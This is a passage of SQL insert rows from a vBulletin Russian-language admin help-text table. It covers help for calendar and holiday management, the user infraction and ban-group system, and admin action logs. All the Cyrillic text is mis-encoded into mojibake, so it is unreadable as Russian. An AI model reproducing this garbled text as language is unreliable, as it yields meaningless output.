(21693, -1, 'admincalendar_remove_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ óêà çà ÃÃîãî êà ëåÃäà ðÿ. Óäà ëåÃèå êà ëåÃäà ðÿ ïîâëå÷åò ïîòåðþ âñåõ åãî ñîáûòèé. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(21694, -1, 'admincalendar_remove_title', 'cphelptext', 'Óäà ëåÃèå êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21695, -1, 'admincalendar_removeholiday_text', 'cphelptext', 'Ãòî ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ óêà çà ÃÃîãî ïðà çäÃèêà . Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà .', 'vbulletin', '', 0, ''),
(21696, -1, 'admincalendar_removeholiday_title', 'cphelptext', 'Óäà ëåÃèå ïðà çäÃèêà ', 'vbulletin', '', 0, ''),
(21697, -1, 'admincalendar_removemod_text', 'cphelptext', 'Ãòî ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ ìîäåðà òîðà . Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ. Ãòà îïåðà öèÿ ÃÃ¥ îáðà òèìà .', 'vbulletin', '', 0, ''),
(21698, -1, 'admincalendar_removemod_title', 'cphelptext', 'Óäà ëèòü ìîäåðà òîðà ', 'vbulletin', '', 0, ''),
(21699, -1, 'admincalendar_updateholiday_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ìîæÃî äîáà âëÿòü Ãîâûå èëè ðåäà êòèðîâà òü ñóùåñòâóþùèå ïðà çäÃèêè. Êà æäûé äîáà âëåÃÃûé âà ìè ïðà çäÃèê áóäåò îòîáðà æà òüñÿ âî âñåõ êà ëåÃäà ðÿõ, ãäå óñòà ÃîâëåÃà îïöèÿ \"Ãîêà çûâà òü óñòà ÃîâëåÃÃûå à äìèÃèñòðà öèåé ïðà çäÃèêè\" óñòà ÃîâëåÃà â \"Äà \".', 'vbulletin', '', 0, ''),
(21700, -1, 'admincalendar_updateholiday_title', 'cphelptext', 'Äîáà âëåÃèå/Ãåäà êòèðîâà Ãèå ïðà çäÃèêîâ', 'vbulletin', '', 0, ''),
(21701, -1, 'admincalendar_updateholiday_description_text', 'cphelptext', 'Îïèñà Ãèå ïðà çäÃèêà îòîáðà æà åòñÿ Ãà ýêðà ÃÃ¥ ïðîñìîòðà ñîáûòèÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21702, -1, 'admincalendar_updateholiday_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21703, -1, 'admincalendar_updateholiday_varname_text', 'cphelptext', 'Ãòî êîðîòêîå Ãà çâà Ãèå ïðà çäÃèêà , èñïîëüçóåìîå äëÿ èäåÃòèôèêà öèè ïðà çäÃèêà è Ãèãäå ÃÃ¥ îòîáðà æà åìîå. Ìîæåò ñîäåðæà òü ëà òèÃñêèå áóêâû, öèôðû è çÃà ê ïîä÷åðêèâà Ãèÿ, ÄÎËÆÃÃŽ Ãà ÷èÃà òüñÿ ñ áóêâû.', 'vbulletin', '', 0, ''),
(21704, -1, 'admincalendar_updateholiday_varname_title', 'cphelptext', 'Ãà çâà Ãèå ïåðåìåÃÃîé', 'vbulletin', '', 0, ''),
(21705, -1, 'admincalendar_updateholiday_title_text', 'cphelptext', 'Çà ãîëîâîê (êðà òêîå îáîçÃà ÷åÃèå) ïðà çäÃèêà îòîáðà æà åòñÿ ïðè ÃåäåëüÃîì èëè ìåñÿ÷Ãîì ðåæèìå ïðîñìîòðà êà ëåÃäà ðÿ, à òà êæå â çà ãîëîâêå ïðè ïðîñìîòðå ñà ìîãî ïðà çäÃèêà .', 'vbulletin', '', 0, ''),
(21706, -1, 'admincalendar_updateholiday_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(21707, -1, 'admincalendar_updateholiday_event_text', 'cphelptext', 'Îïèñà Ãèå ïðà çäÃèêà . ÌîæÃî èñïîëüçîâà òü BB êîäû è ñìà éëû (Ãî ÃÃ¥ HTML). Îïöèÿ, ðåãóëèðóþùà ÿ ïðåîáðà çîâà Ãèå ñìà éëîâ â ãðà ôè÷åñêèå ýêâèâà ëåÃòû, ðà ñïîëîæåÃà Ãèæå.', 'vbulletin', 'zCarot', 1206964370, '3.7.0 Release Candidate 2'),
(21708, -1, 'admincalendar_updateholiday_event_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', '', 0, ''),
(21709, -1, 'admincalendar_updateholiday_recurring_text', 'cphelptext', 'Çäåñü óñòà Ãà âëèâà åòñÿ ïåðèîäè÷Ãîñòü Ãà ñòóïëåÃèÿ ïðà çäÃèêà . ÂîçìîæÃûå âà ðèà Ãòû: îïðåäåëåÃÃà ÿ äà òà ðà ç â ãîäó èëè îïðåäåëåÃÃûé äåÃü îïðåäåëåÃÃîãî ìåñÿöà (Ãà ïðèìåð, ïåðâîå âîñêðåñåÃüå èþÃÿ).', 'vbulletin', '', 0, ''),
(21710, -1, 'admincalendar_updateholiday_recurring_title', 'cphelptext', 'Ãåðèîäè÷Ãîñòü', 'vbulletin', '', 0, ''),
(21711, -1, 'admincalendar_updateholiday_allowsmilies_text', 'cphelptext', 'Åñëè óñòà Ãîâèòü îïöèþ â \"Äà \", ñìà éëû â îïèñà Ãèè (òà êæå, êà ê è â òåêñòå ñîîáùåÃèÿ) áóäóò ïðåîáðà çîâà Ãû â èõ ãðà ôè÷åñêèå ýêâèâà ëåÃòû.', 'vbulletin', '', 0, ''),
(21712, -1, 'admincalendar_updateholiday_allowsmilies_title', 'cphelptext', 'Ãðåîáðà çîâûâà òü ñìà éëû?', 'vbulletin', '', 0, ''),
(21713, -1, 'admininfraction_text', 'cphelptext', 'Ñèñòåìà Ãà ðóøåÃèé ïîëüçîâà òåëåé ñîçäà Ãà äëÿ à âòîìà òè÷åñêîãî óïðà âëåÃèÿ ïîëüçîâà òåëÿìè, ÃåîäÃîêðà òÃî Ãà ðóøà þùèìè êà êèå-ëèáî ïðà âèëà .\r\n \r\nÃåðâîé ïîëîâèÃîé ñèñòåìû ÿâëÿþòñÿ óðîâÃè Ãà ðóøåÃèé. Ãòè óðîâÃè ìîãóò âåñüìà îòëè÷à òüñÿ Ãà ðà çÃûõ ôîðóìà õ, òà ê êà ê çà âèñÿò îò ñîäåðæèìîãî è ñïåöèà ëèçà öèè êà æäîãî ôîðóìà . Âû ìîæåòå ñîçäà òü Ãåñêîëüêî áà çîâûõ óðîâÃåé, èëè îãðîìÃóþ ñèñòåìó, ïîäðà çóìåâà þùóþ êîÃêðåòÃîå Ãà êà çà Ãèå äëÿ êà æäîãî Ãà ðóøåÃèÿ.\r\n \r\nÃðè ñîçäà Ãèè ýòèõ óðîâÃåé, ÃÃ¥ çà áûâà éòå î ìèÃèìà ëüÃûõ áà ëëà õ, êîòîðûå ïðèâåäóò ê îãðà Ãè÷åÃèþ ïîëüçîâà òåëÿ â ïðà âà õ ÷åðåç ñïåöèà ëüÃóþ ãðóïïó ïîëüçîâà òåëåé, îïðåäåëÿþùóþ, ÷òî èìåÃÃî ñëåäóåò îãðà Ãè÷èòü. Åñëè âû ñ÷èòà åòå, ÷òî ïîëüçîâà òåëþ ñëåäóåò îãðà Ãè÷èòü ïðà âà , êîãäà Ãà êîïèòñÿ Õ áà ëëîâ Ãà ðóøåÃèé, òî âà ì ñëåäóåò ïîäóìà òü çà êà êèå Ãà ðóøåÃèÿ îà ñðà çó áû ëèøèòüñÿ ïðà â, à çà êà êèå - òîëüêî ïðè ñóììèðîâà Ãèè Ãåñêîëüêèõ Ãà ðóøåÃèé (äî òåõ ïîð, ïîêà ÃÃ¥ Ãà áåð¸òñÿ Õ áà ëëîâ).\r\n \r\nÊà æäîå Ãà ðóøåÃèå èìååò âðåìÿ èñòå÷åÃèÿ. Ãðè èñòå÷åÃèè áà ëëû Ãà ðóøåÃèé âû÷èòà þòñÿ èç îáùåé ñóììû áà ëëîâ Ãà ðóøåÃèé ïîëüçîâà òåëÿ è, ïðè Ãåîáõîäèìîñòè, âîññòà Ãà âëèâà þòñÿ ïðà âà .\r\n \r\nÓðîâÃè Ãà ðóøåÃèé ìîãóò áûòü èñïîëüçîâà Ãû â êà ÷åñòâå ïðåäóïðåæäåÃèé. ÃðåäóïðåæäåÃèÿ ÃÃ¥ ïðèáà âëÿþò Ãèêà êèõ áà ëëîâ Ãà ðóøåÃèé ê îáùåìó êîëè÷åñòâó ó ïîëüçîâà òåëÿ. ÃŽÃè ÿâëÿþòñÿ îäÃèì èç ñïîñîáîâ Ãà ïîìèÃà Ãèÿ ïîëüçîâà òåëþ Ãåîáõîäèìîñòè ñîáëþäåÃèÿ ïðà âèë ôîðóìà . Ìîäåðà òîðû ìîãóò âûäà âà òü êà ê Ãà ðóøåÃèÿ, òà ê è ïðåäóïðåæäåÃèÿ, åñëè äëÿ ñîîòâåòñòâóþùèõ óðîâÃåé Ãà ðóøåÃèé åñòü âîçìîæÃîñòü îãðà Ãè÷èòñÿ ïðåäóïðåæäåÃèåì.\r\n \r\nÂòîðîé ïîëîâèÃîé ñèñòåìû ÿâëÿåòñÿ ñîçäà Ãèå ãðóïï ïîëüçîâà òåëåé, êîòîðûå îãðà Ãè÷èâà þò Ãà ðóøèòåëÿ â îïðåäåë¸ÃÃûõ ïðà âà õ.\r\n \r\nÃðà âà ïîëüçîâà òåëÿ ðà ññ÷èòûâà þòñÿ òà êèì îáðà çîì: áåðóòñÿ òå ïðà âà , êîòîðûå åñòü ó ïîëüçîâà òåëÿ (÷òî åìó ðà çðåøåÃî), à çà òåì, ïðè îïðåäåë¸ÃÃîì êîëè÷åñòâå áà ëëîâ ê ïîëüçîâà òåëþ ïðèìåÃÿåòñÿ ãðóïïà Ãà ðóøèòåëåé äëÿ îãðà Ãè÷åÃèÿ åãî ïðà â. ×òîáû îãðà Ãè÷èòü ïîëüçîâà òåëÿ ïî ÃóæÃûì âà ì ïóÃêòà ì, ñëåäóåò ñîçäà òü ãðóïïó Ãà ðóøèòåëåé (â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé), óñòà Ãîâèòü åé âñå ïðà âà (\"Äà \" ïî âñåì ïóÃêòà ì), à çà òåì ñÃÿòü òå ïðà âà , êîòîðûå ñëåäóåò îòÃÿòü ó ïîëüçîâà òåëÿ, Ãà ðóøà þùåãî ïðà âèëà . Òî åñòü, åñëè ñòîèò \"Äà \", òî äà ÃÃûé ïóÃêò èãÃîðèðóåòñÿ, åñëè ñòîèò \"Ãåò\" è ó ïîëüçîâà òåëÿ åñòü ÃóæÃîå êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé, òî ñ Ãåãî ñÃèìà åòñÿ ýòî ïðà âî äî òåõ ïîð, ïîêà êîëè÷åñòâî áà ëëîâ ÃÃ¥ ñÃèìåòñÿ.\r\n \r\nÃðè Ãà áîðå ïîëüçîâà òåëåì áà ëëîâ Ãà ðóøåÃèé, êîòîðûå õâà òèò Ãà ïðèìåÃÃ¥Ãèå âòîðîé ãðóïïû Ãà ðóøèòåëåé äëÿ îãðà Ãè÷åÃèÿ ïðà â, ñ Ãåãî áóäóò ñÃèìà òüñÿ êà ê ïðà âà , ñÃèìà åìûå ïåðâîé ãðóïïîé, òà ê è ïðà âà , ñÃèìà åìûå âòîðîé.', 'vbulletin', 'zCarot', 1153498962, '3.6.0 Release Candidate 3'),
(21714, -1, 'admininfraction_title', 'cphelptext', 'ÃŽ Ãà ðóøåÃèÿõ ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21715, -1, 'admininfraction_editbangroup_amount_text', 'cphelptext', 'Êîëè÷åñòâî òîãî, ÷òî âû âûáðà ëè â ïà ðà ìåòðå \"òèï\", äëÿ à âòîìà òè÷åñêîé áëîêèðîâêè.', 'vbulletin', 'zCarot', 1199285737, '3.7.0 Beta 4'),
(21716, -1, 'admininfraction_editbangroup_amount_title', 'cphelptext', 'Êîëè÷åñòâî', 'vbulletin', 'zCarot', 1199285737, '3.7.0 Beta 4'),
(21717, -1, 'admininfraction_editbangroup_method_text', 'cphelptext', 'Òèï (Ãà ðóøåÃèé èëè áà ëëîâ) äëÿ à âòîìà òè÷åñêîé áëîêèðîâêè. Äëÿ ñîñòà âëåÃèÿ óñëîâèÿ ìèÃèìà ëüÃîãî çÃà ÷åÃèÿ äëÿ ñðà áà òûâà Ãèÿ, èñïîëüçóåòñÿ ïà ðà ìåòð \"Êîëè÷åñòâî\".', 'vbulletin', 'zCarot', 1199285800, '3.7.0 Beta 4'),
(21718, -1, 'admininfraction_editbangroup_method_title', 'cphelptext', 'Òèï', 'vbulletin', 'zCarot', 1199285800, '3.7.0 Beta 4'),
(21719, -1, 'admininfraction_editbangroup_usergroupid_text', 'cphelptext', 'Ê êà êîé îñÃîâÃîé ãðóïïå ïîëüçîâà òåëåé ïðèìåÃèìî äà ÃÃîå óñëîâèå? Âûáåðèòå \"-- Âñå ãðóïïû ïîëüçîâà òåëåé --\", ÷òîáû ïðèìåÃÿòü äà ÃÃîå óñëîâèå êî âñåì ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1201134345, '3.7.0 Beta 5'),
(21720, -1, 'admininfraction_editbangroup_usergroupid_title', 'cphelptext', 'ÎñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1199285860, '3.7.0 Beta 4'),
(21721, -1, 'admininfraction_editbangroup_banusergroupid_text', 'cphelptext', 'Ãðóïïà , â êîòîðóþ ïåðåìåùà åòñÿ äà ÃÃûé ïîëüçîâà òåëü â òå÷åÃèå ñðîêà áëîêèðîâêè.', 'vbulletin', 'zCarot', 1199285893, '3.7.0 Beta 4'),
(21722, -1, 'admininfraction_editbangroup_banusergroupid_title', 'cphelptext', 'Ãåðåìåñòèòü â ãðóïïó', 'vbulletin', 'zCarot', 1199285893, '3.7.0 Beta 4'),
(21723, -1, 'admininfraction_editbangroup_period_text', 'cphelptext', 'ÃðîäîëæèòåëüÃîñòü áëîêèðîâêè ïîëüçîâà òåëÿ. Âû ìîæåòå óêà çà òü ïîñòîÿÃÃóþ áëîêèðîâêó', 'vbulletin', 'zCarot', 1207649690, '3.7.0 Release Candidate 3'),
(21724, -1, 'admininfraction_editbangroup_period_title', 'cphelptext', 'ÃðîäîëæèòåëüÃîñòü áëîêèðîâêè', 'vbulletin', 'zCarot', 1199285962, '3.7.0 Beta 4'),
(21725, -1, 'admininfraction_editgroup_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ñìîæåòå äîáà âèòü Ãîâóþ ãðóïïó Ãà ðóøèòåëåé èëè îòðåäà êòèðîâà òü îäÃó èç ñóùåñòâóþùèõ.\r\n\r\nÃðóïïû Ãà ðóøèòåëåé îñÃîâûâà þòñÿ Ãà ñóììà ðÃîì êîëè÷åñòâå áà ëëîâ ðåïóòà öèè èëè îáùåìó êîëè÷åñòâó Ãà ðóøåÃèé. Ãðóïïû Ãà ðóøèòåëåé ïðèìåÃÿþòñÿ ê ïîëüçîâà òåëþ, åñëè åãî îñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëåé ñîîòâåòñòâóåò óêà çà ÃÃîé Ãà äà ÃÃîé ñòðà Ãèöå, à òà êæå, åñëè Ãà âûáðà Ãî -- Âñå ãðóïïû ïîëüçîâà òåëåé -- .\r\n\r\nÊà æäà ÿ ãðóïïà Ãà ðóøèòåëåé áóäåò îãðà Ãè÷èòü îñÃîâÃóþ ãðóïïó ïîëüçîâà òåëÿ ïðè ñîîòâåòñòâèè èëè ïðåâûøåÃèè åãî êîëè÷åñòâà áà ëëîâ Ãà ðóøåÃèé èëè îáùåãî êîëè÷åñòâà Ãà ðóøåÃèé öèôðå, óêà çà ÃÃîé Ãà ýòîé ñòðà Ãèöå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21726, -1, 'admininfraction_editgroup_title', 'cphelptext', 'Äîáà âëåÃèå/ðåäà êòèðîâà Ãèå ãðóïï Ãà ðóøèòåëåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21727, -1, 'admininfraction_editgroup_override_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè èñïîëüçîâà òü âûäåëåÃèå HTML êîäîì èìåÃè Ãà ðóøèòåëÿ è åãî ñòà òóñ èç ãðóïïû ïîëüçîâà òåëåé äëÿ îãðà Ãè÷åÃèÿ ïðà â îñÃîâÃîé.', 'vbulletin', 'zCarot', 1154615488, '3.6.0'),
(21728, -1, 'admininfraction_editgroup_override_title', 'cphelptext', 'Ãîâîå âûäåëåÃèå', 'vbulletin', 'zCarot', 1154615488, '3.6.0'),
(21729, -1, 'admininfraction_editgroup_pointlevel_text', 'cphelptext', 'Çäåñü ñëåäóåò óêà çà òü îáùåå êîëè÷åñòâî Ãà ðóøåÃèé èëè ñóììó áà ëëîâ Ãà ðóøåÃèé ïîëüçîâà òåëÿ, ê êîòîðîìó áóäóò ïðèìåÃÿòüñÿ îãðà Ãè÷åÃèÿ ýòîé ãðóïïû Ãà ðóøèòåëåé.\r\n\r\nÊà æäà ÿ ãðóïïà Ãà ðóøèòåëåé, êîòîðà ÿ ïîäõîäèò îñÃîâÃîé ãðóïïå ïîëüçîâà òåëÿ, áóäåò îãðà Ãè÷èâà òü ïðà âà ê ïîëüçîâà òåëÿ, êîãäà åãî(å¸) áà ëëû Ãà ðóøåÃèé èëè îáùåå êîëè÷åñòâî Ãà ðóøåÃèé áóäåò ðà âÃî èëè ïðåâûøà òü äà ÃÃîå çÃà ÷åÃèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21730, -1, 'admininfraction_editgroup_pointlevel_title', 'cphelptext', 'Ãà ëëîâ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21731, -1, 'admininfraction_editgroup_usergroupid_text', 'cphelptext', 'Ãòî òà ãðóïïà ïîëüçîâà òåëåé, äëÿ êîòîðîé áóäåò ïðèìåÃÿòüñÿ äà ÃÃà ÿ ãðóïïà Ãà ðóøèòåëåé. Åñëè âû âûáåðèòå -- Âñå ãðóïïû ïîëüçîâà òåëåé -- , òî äà ÃÃà ÿ ãðóïïà Ãà ðóøèòåëåé áóäåò ïðèìåÃÿòüñÿ êî âñåì ïîëüçîâà òåëÿì.  ïðîòèâÃîì ñëó÷à å äà ÃÃà ÿ ãðóïïà Ãà ðóøèòåëåé áóäåò îãðà Ãè÷èâà òü ïðà âà ïîëüçîâà òåëÿ, åñëè åãî îñÃîâÃà ÿ ãðóïïà áóäåò ñîîòâåòñòâîâà òü óêà çà ÃÃîé çäåñü è åãî áà ëëû Ãà ðóøåÃèé èëè îáùåå êîëè÷åñòâî Ãà ðóøåÃèé áóäåò ðà âÃî èëè ïðåâçîéä¸ò çÃà ÷åÃèå áà ëëîâ, óêà çà ÃÃîå äëÿ ýòîé ãðóïïû Ãà ðóøèòåëåé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21732, -1, 'admininfraction_editgroup_usergroupid_title', 'cphelptext', 'ÎñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21733, -1, 'admininfraction_editgroup_orusergroupid_text', 'cphelptext', 'Êîãäà ýòà ãðóïïà Ãà ðóøèòåëåé áóäåò ïðèìåÃÿòüñÿ ê ïîëüçîâà òåëþ, äà ÃÃà ÿ ãðóïïà ïîëüçîâà òåëåé áóäåò èñïîëüçîâà Ãà äëÿ îïðåäåëåÃèÿ ïðà â, êîòîðûå ñëåäóåò îãðà Ãè÷èòü.\r\n\r\nÃðóïïû Ãà ðóøèòåëåé ðà áîòà þò â ïðîòèâîïîëîæÃîñòü îáû÷Ãûì ãðóïïà ì ïîëüçîâà òåëåé. \r\n\r\nÅñëè êà êîå-òî ðà çðåøåÃèå â ãðóïïå Ãà ðóøèòåëåé áóäåò çà ïðåùåÃî, òî åñòü Ãåò , òî ïîëüçîâà òåëü ÃÃ¥ ñìîæåò áîëåå èñïîëüçîâà òü äà ÃÃîå ïðà âî (åñëè èìåë òà êîå äî ýòîãî).\r\n\r\nÅñëè æå áóäåò ñòîÿòü Äà , òî äà ÃÃîå ðà çðåøåÃèå îñòà Ãåòñÿ òà êèì êà ê áûëî, òî åñòü åñëè ïîëüçîâà òåëü èìåë ïðà âî äåëà òü ýòî, òî è áóäåò, à åñëè ÃÃ¥ èìåë, òî è ÃÃ¥ áóäåò.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21734, -1, 'admininfraction_editgroup_orusergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé äëÿ îãðà Ãè÷åÃèÿ ïðà â îñÃîâÃîé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21735, -1, 'admininfraction_editlevel_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå äà ÃÃîãî óðîâÃÿ ðåïóòà öèè. ÃŽÃî îòîáðà æà åòñÿ ïðè âûäà ÷å Ãà ðóøåÃèÿ êà ê îäèà èç âà ðèà Ãòîâ, à òà êæå óêà çûâà åòñÿ â çà ãîëîâêå îòïðà âëÿåìîãî ïîëüçîâà òåëþ óâåäîìëåÃèþ ïî ýëåêòðîÃÃîé ïî÷òå/ËÑ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21736, -1, 'admininfraction_editlevel_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21737, -1, 'admininfraction_editlevel_expires_text', 'cphelptext', 'Ãà ðóøåÃèå ìîæåò ëèáî èñòåêà òü ÷åðåç îïðåäåë¸ÃÃîå âðåìÿ, ëèáî ÃÃ¥ èñòåêà òü Ãèêîãäà . Ãðè èñòå÷åÃèè Ãà ðóøåÃèÿ áà ëëû, çà ÷èñëåÃÃûå ïîëüçîâà òåëþ çà Ãåãî, áóäóò âû÷òåÃû èç îáùåé ñóììû áà ëëîâ è ïðè Ãåîáõîäèìîñòè ïîëüçîâà òåëþ âîññòà Ãîâÿò êà êèå-òî ïðà âà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21738, -1, 'admininfraction_editlevel_expires_title', 'cphelptext', 'ÃðîäîëæèòåëüÃîñòü', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21739, -1, 'admininfraction_editlevel_points_text', 'cphelptext', 'Ãòî ÷èñëî áà ëëîâ, êîòîðîå áóäåò Ãà ÷èñëåÃû ïîëüçîâà òåëþ çà äà ÃÃîå Ãà ðóøåÃèå. Êà æäûé óðîâåÃü Ãà ðóøåÃèå äîëæåà ïðèñâà èâà òü êà ê ìèÃèìóì 1 áà ëë. Ñóììà áà ëëîâ èñïîëüçóåòñÿ, ÷òîáû îïðåäåëèòü êà êèìè ãðóïïà ìè Ãà ðóøåÃèé ñòîèò îãðà Ãè÷èòü ïðà âà äà ÃÃîãî ïîëüçîâà òåëÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21740, -1, 'admininfraction_editlevel_points_title', 'cphelptext', 'Ãà ëëîâ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21741, -1, 'admininfraction_editlevel_warning_text', 'cphelptext', 'ÓðîâÃè Ãà ðóøåÃèé ìîãóò äà âà òü ïðà âî âûäà òü ïðåäóïðåæäåÃèå. Ãðè âûäà ÷å Ãà ðóøåÃèé ìîäåðà òîð ñìîæåò âûáðà òü, ñëåäóåò ëè Ãà êà çà òü ïîëüçîâà òåëÿ è äà òü åìó ñîîòâåòñòâóþùèå áà ëëû Ãà ðóøåÃèé èëè òîëüêî ïðåäóïðåäèòü.\r\n\r\nÃðåäóïðåæäåÃèå ÃÃ¥ äîáà âëÿåò Ãèêà êèõ áà ëëîâ Ãà ðóøåÃèé ïîëüçîâà òåëþ è ïîýòîìó ÃÃ¥ âëå÷¸ò çà ñîáîé îãðà Ãè÷åÃèå êà êèõ-ëèáî ïðà â.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21742, -1, 'admininfraction_editlevel_warning_title', 'cphelptext', 'ÃðåäóïðåæäåÃèå', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21743, -1, 'admininfraction_editlevel_extend_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ïðè ïîëó÷åÃèè âòîðîãî, à Ãà ëîãè÷Ãîãî äà ÃÃîìó, Ãà ðóøåÃèÿ ñðîê èñòå÷åÃèÿ Ãà ðóøåÃèÿ áóäåò ïðîäë¸Ã.\r\n\r\nÃà ïðèìåð, ïîëüçîâà òåëü ïîëó÷èë Ãà ðóøåÃèå çà ñïà ì, êîòîðîå èñòåêà åò ÷åðåç 1 äåÃü. ×åðåç ÷à ñ ýòîò æå ïîëüçîâà òåëü ïîëó÷èë âòîðîå Ãà ðóøåÃèå çà ñïà ì. Òà ê êà ê ïîëüçîâà òåëü óæå èìååò Ãà ðóøåÃèå çà ñïà ì, òî ýòî Ãà ðóøåÃèå ïðîäëèò äëèòåëüÃîñòü ïðåäûäóùåãî.  ðåçóëüòà òå Ãîâîå Ãà ðóøåÃèÿ áóäåò äåéñòâîâà òü ÃÃ¥ äåÃü, à 1 äåÃü è 23 ÷à ñà (÷à ñ óæå ïðîø¸ë). Åñëè ïîëüçîâà òåëü ïîëó÷èò òðåòüå Ãà ðóøåÃèå, òî äîáà âèòñÿ åù¸ äåÃü, è òà ê äà ëåå.', 'vbulletin', 'zCarot', 1155944185, '3.6.1'),
(21744, -1, 'admininfraction_editlevel_extend_title', 'cphelptext', 'Ãðîäëåâà òü', 'vbulletin', 'zCarot', 1155944185, '3.6.1'),
(21745, -1, 'admininfraction_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ñìîæåòå ïðîñìîòðåòü è èçìåÃèòü âà øè òåêóùèå óðîâÃè Ãà ðóøåÃèé è ãðóïïû Ãà ðóøèòåëåé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21746, -1, 'admininfraction_modify_title', 'cphelptext', 'Ãà ðóøåÃèÿ ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(21747, -1, 'adminlog_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÑòà òèñòèêà \r\nÇà ïèñè äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ \r\nÇà ïèñè äåéñòâèé ïà Ãåëè ìîäåðà òîðà \r\nÇà ïèñè äåéñòâèé ïëà Ãîâûõ ðà áîò \r\nÇà ïèñè äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ: \r\nÇà ïèñè äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà ïîçâîëÿþò îòñëåæèâà òü äåéñòâèÿ âà øèõ ñî-à äìèÃèñòðà òîðîâ, à òà êæå çà ïèñûâà òü IP à äðåñà , ñ êîòîðûõ ïðîâîäèëîñü à äìèÃèñòðèðîâà Ãèå. Êà æäûé ðà ç êîãäà â ïà Ãåëè à äìèÃèñòðà òîðà îñóùåñòâëÿåòñÿ ëþáà ÿ îïåðà öèÿ, ñîõðà Ãÿåòñÿ çà ïèñü î Ãåé. Ñîõðà ÃÃ¥ÃÃà ÿ èÃôîðìà öèÿ âêëþ÷à åò â ñåáÿ èìÿ ïîëüçîâà òåëÿ, IP à äðåñ, èñïîëüçîâà ÃÃûé ñêðèïò, à òà êæå äîïîëÃèòåëüÃóþ èÃôîðìà öèþ, êîòîðà ÿ çà âèñèò îò ñîâåðøåÃÃîãî äåéñòâèÿ. \r\nÂû ìîæåòå îãðà Ãè÷èòü âîçìîæÃîñòü ïðîñìà òðèâà òü/óäà ëÿòü çà ïèñè äåéñòâèé ïà Ãåëè óïðà âëåÃèÿ äðóãèìè à äìèÃèñòðà òîðà ìè. (Ñì. Îãðà Ãè÷åÃèå äîñòóïà ê çà ïèñÿì äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21748, -1, 'adminlog_title', 'cphelptext', 'ÃŽ çà ïèñÿõ äåéñòâèé ïà Ãåëè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
